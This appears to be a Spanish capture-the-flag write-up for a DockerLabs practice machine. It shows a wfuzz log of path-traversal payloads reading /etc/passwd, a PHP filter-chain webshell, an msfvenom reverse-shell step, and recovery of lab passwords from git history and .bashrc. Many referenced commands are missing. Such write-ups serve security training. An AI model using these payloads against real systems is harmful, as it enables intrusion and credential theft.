Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipreport.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shreport.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
Info:
Si intentamos conectarnos a la pagina veremos que va por dominio y no se esta resolviendo adecuadamente, por lo que tendremos que editar el archivo hosts de la siguiente forma:
Lo guardamos y probamos a entrar de nuevo a la pagina:
Vemos que nos carga la pagina con normalidad y aparentemente parece ser una pagina del gobierno.
Gobuster
Si fuzzeamos un poco para ver que encontramos:
Info:
Vemos varias cosas interesantes, vamos a probar con cada uno de los PHP por si tuviera algun LFI con algun parametro vulnerable.
FFUF
Info:
Vemos que tiene un parametro llamado fileabout.php, por lo que probaremos a insertarlo en la pagina web y leer el passwd:
Info:
Vemos que funciona correctamente y nos saca el listado del archivo.
Ahora vamos a ver que archivos puede haber interesantes:
Si queremos por ejemplo crear un parametro llamado cmd que ejecute cualquier comando que le pongamos, seria de la siguiente forma...
Copiamos eso y lo metemos despues del igual de la siguiente manera...
EJEMPLO:
Info:
Vemos que esta funcionando, por lo que nos vamos a crear una aplicacion con msfvenom y hacernos una reverse shell con un meterpreter.
Escalate user www-data
MSFVENOM .elf
Info:
Esto nos generara un archivo .elf el cual tendremos que llevar a la maquina victima de la siguiente forma:
En la URL pondremos lo siguiente:
Una vez ejecutado esto, comprobaremos que realmente se ha cargado el archivo en /tmp:
Info:
Vemos que si, por lo que ahora le daremos permisos de ejecuccion y seguidamente lo ejecutaremos.
Vamos a URL Encodearlo para que no de ningun error y si volvemos a listar el archivo...
Info:
Vemos que ya tiene permisos de ejecuccion, por lo que estaremos a la escucha antes de ejecutarlo de la siguiente forma:
Una vez estando ya a la escucha con todo configurado, ejecutaremos el .elf de la siguiente forma:
Si ahora nos volvemos a donde teniamos la escucha veremos que se nos ha creado una shell:
Escalate user adm
Si leemos el siguiente archivo, veremos las credenciales para entrar como root a mysql:
Info:
Por lo que nos meteremos en la misma maquina con dichas credenciales.
Y con esto estariamos dentro de mysql.
Info:
Info:
Info:
Pero no nos servira de mucho...
Si investigamos un poco mas en la carpeta de html veremos una bastante interesante llamada desarrollo en la que contiene un git, por lo que vemos que tenemos git instalado y podremos sacar informacion sensible de la siguiente forma.
Si ingresamos eso nos va a dar el siguiente error:
Pero si intentamos marcarlo como directorio seguro no nos va a dejar por lo que haremos lo siguiente:
Ahora si que nos dejara listar los logs:
Info:
Pero hay uno en concreto que nos interesa:
Por lo que vamos a investigar sobre ese commit.
Info:
Vemos que nos aparece lo que es la nueva contraseña del usuario adm:
Por lo que si probamos hacer lo siguiente...
Metemos como contraseña 9fR8pLt@Q2uX7dM^sW3zE5bK8nQ@7pX y veremos que seremos dicho usuario.
Escalate Privileges
Si leemos el siguiente archivo:
Info:
Vemos una linea interesante que seria la siguiente:
Parece ser que hay una contraseña en hexadecimal, por lo que vamos a pasarla a texto plano:
Probaremos dicha contraseña con el usuario root y veremos que es la de dicho usuario.
Metemos como contraseña dockerlabs4u y seremos root.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://realgob.dl/about.php?file=FUZZ
Total requests: 929
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000016: 200 125 L 408 W 6264 Ch "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
000000206: 200 105 L 389 W 5093 Ch "../../../../../../../../../../../../etc/hosts"
000000209: 200 115 L 484 W 5630 Ch "/etc/hosts.deny"
000000205: 200 105 L 389 W 5093 Ch "/etc/hosts"
000000208: 200 108 L 430 W 5330 Ch "/etc/hosts.allow"
000000250: 200 118 L 438 W 5445 Ch "/etc/nsswitch.conf"
000000249: 200 117 L 476 W 5686 Ch "/etc/netconfig"
000000248: 200 127 L 547 W 6045 Ch "/etc/mysql/my.cnf"
000000237: 200 100 L 378 W 4945 Ch "/etc/issue"
000000236: 200 451 L 1415 W 13058 Ch "/etc/init.d/apache2"
000000253: 200 125 L 408 W 6264 Ch "/./././././././././././etc/passwd"
000000259: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000267: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../etc/passwd"
000000273: 200 125 L 408 W 6264 Ch "../../../../../../../etc/passwd"
000000277: 200 125 L 408 W 6264 Ch "../../../etc/passwd"
000000276: 200 125 L 408 W 6264 Ch "../../../../etc/passwd"
000000275: 200 125 L 408 W 6264 Ch "../../../../../etc/passwd"
000000274: 200 125 L 408 W 6264 Ch "../../../../../../etc/passwd"
000000272: 200 125 L 408 W 6264 Ch "../../../../../../../../etc/passwd"
000000271: 200 125 L 408 W 6264 Ch "../../../../../../../../../etc/passwd"
000000270: 200 125 L 408 W 6264 Ch "../../../../../../../../../../etc/passwd"
000000269: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../etc/passwd"
000000263: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../../../../etc/passwd"
000000265: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../../etc/passwd"
000000266: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../etc/passwd"
000000268: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../etc/passwd"
000000261: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../../../../../../etc/passwd"
000000264: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../../../etc/passwd"
000000262: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../../../../../etc/passwd"
000000258: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000260: 200 125 L 408 W 6264 Ch "../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000257: 200 125 L 408 W 6264 Ch "/etc/passwd"
000000254: 200 125 L 408 W 6264 Ch "/../../../../../../../../../../etc/passwd"
000000311: 200 125 L 408 W 6264 Ch "../../../../../../etc/passwd&=%3C%3C%3C%3C"
000000400: 200 139 L 493 W 5830 Ch "/etc/rpc"
000000399: 200 107 L 411 W 5159 Ch "/etc/resolv.conf"
000000422: 200 220 L 760 W 8173 Ch "/etc/ssh/sshd_config"
000000500: 200 152 L 531 W 6422 Ch "/proc/meminfo"
000000509: 200 157 L 515 W 6336 Ch "/proc/self/status"
000000510: 200 99 L 394 W 5109 Ch "/proc/version"
000000506: 200 102 L 385 W 5006 Ch "/proc/partitions"
000000507: 200 98 L 374 W 4946 Ch "/proc/self/cmdline"
000000505: 200 302 L 3836 W 35519 Ch "/proc/net/tcp"
000000502: 200 100 L 388 W 5075 Ch "/proc/net/arp"
000000504: 200 101 L 406 W 5303 Ch "/proc/net/route"
000000499: 200 99 L 378 W 4944 Ch "/proc/loadavg"
000000503: 200 102 L 427 W 5367 Ch "/proc/net/dev"
000000501: 200 120 L 505 W 7073 Ch "/proc/mounts"
000000497: 200 314 L 1637 W 11999 Ch "/proc/cpuinfo"
000000498: 200 165 L 1217 W 13688 Ch "/proc/interrupts"
000000699: 200 98 L 375 W 297503 Ch "/var/log/lastlog"
000000741: 200 98 L 386 W 7991 Ch "/var/log/wtmp"
000000929: 200 125 L 408 W 6264 Ch "///////../../../etc/passwd"
000000023: 200 125 L 408 W 6264 Ch "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
000000020: 200 125 L 408 W 6264 Ch "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
000000135: 200 99 L 379 W 4956 Ch "/etc/fstab"
000000129: 200 102 L 409 W 5189 Ch "/etc/apt/sources.list"
000000121: 200 324 L 1482 W 12119 Ch "/etc/apache2/apache2.conf"
000000138: 200 145 L 420 W 5574 Ch "/etc/group"
Total time: 8.726811
Processed Requests: 929
Filtered Requests: 870
Requests/sec.: 106.4535
$ python3 php_filter_chain_generator.py --chain '<?php echo shell_exec($_GET["cmd"]);?>'
[+] The following gadget chain will generate the following code : <?php echo shell_exec($_GET["cmd"]);?> (base64 value: PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWyJjbWQiXSk7Pz4)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
commit e84b3048cf586ad10eb3194025ae9d57dac8b629 (HEAD -> master)
Author: developer <developer@example.com>
Date: Mon Oct 14 07:47:14 2024 +0000
Cambios en el panel de login
commit 1e3fe13e662dacb85056691d3afc932c16a1e3df
Author: sysadmin <sysadmin@example.com>
Date: Mon Oct 14 07:46:57 2024 +0000
Actualizaci<C3><B3>n de la versi<C3><B3>n de PHP
commit cd04778b50b131f5041bd7f9e6895741d6f4b98b
Author: editor <editor@example.com>
Date: Mon Oct 14 07:46:43 2024 +0000
Actualizaci<C3><B3>n de contenido en el panel de noticias
commit 0baffeec1777f9dfe201c447dcbc37f10ce1dafa
Author: adm <adm@example.com>
Date: Mon Oct 14 07:44:17 2024 +0000
Acceso a Remote Management
commit 2d5e983bab20c69c2f2ddc75a51720dbe60958e6
Author: Usuario Simulado <usuario.simulado@example.com>
Date: Mon Oct 14 07:39:40 2024 +0000
Registrar actividad sospechosa
commit e562db0b7923041980332e5988d94edf9a5df602
Author: Usuario Simulado <usuario.simulado@example.com>
Date: Mon Oct 14 07:39:33 2024 +0000
Registrar cambio en la configuraci<C3><B3>n del sistema
commit 837bdf4af4514bcdb218733cf21c4c192b87fe91
Author: Usuario Simulado <usuario.simulado@example.com>
Date: Mon Oct 14 07:39:27 2024 +0000
Registrar intento de acceso no autorizado
commit 9a36af726878b68de4f99fffb674ddfbe8c996ed
Author: Usuario Simulado <usuario.simulado@example.com>
Date: Mon Oct 14 07:38:17 2024 +0000
Actualizaci<C3><B3>n de notas y hash de contrase<C3><B1>a
commit a6641dd60da6558616acb478ade407d8351a3e57
Author: Usuario Simulado <usuario.simulado@example.com>
Date: Mon Oct 14 07:32:29 2024 +0000
Pago fraudulento reporte
commit 0baffeec1777f9dfe201c447dcbc37f10ce1dafa
Author: adm <adm@example.com>
Date: Mon Oct 14 07:44:17 2024 +0000
Acceso a Remote Management
git show 0baffeec1777f9dfe201c447dcbc37f10ce1dafa
commit 0baffeec1777f9dfe201c447dcbc37f10ce1dafa
Author: adm <adm@example.com>
Date: Mon Oct 14 07:44:17 2024 +0000
Acceso a Remote Management
diff --git a/remote_management_log.txt b/remote_management_log.txt
new file mode 100644
index 0000000..eafd8c6
--- /dev/null
+++ b/remote_management_log.txt
@@ -0,0 +1 @@
+Acceso a Remote Management realizado por 'adm' el Mon Oct 14 07:44:17 GMT 2024. Nueva contrase<C3><B1>a: 9fR8pLt@Q2uX7dM^sW3zE5bK8nQ@7pX
9fR8pLt@Q2uX7dM^sW3zE5bK8nQ@7pX
su adm
cat .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
export MY_PASS='64 6f 63 6b 65 72 6c 61 62 73 34 75'
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Add an "alert" alias for long running commands. Use like so:
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi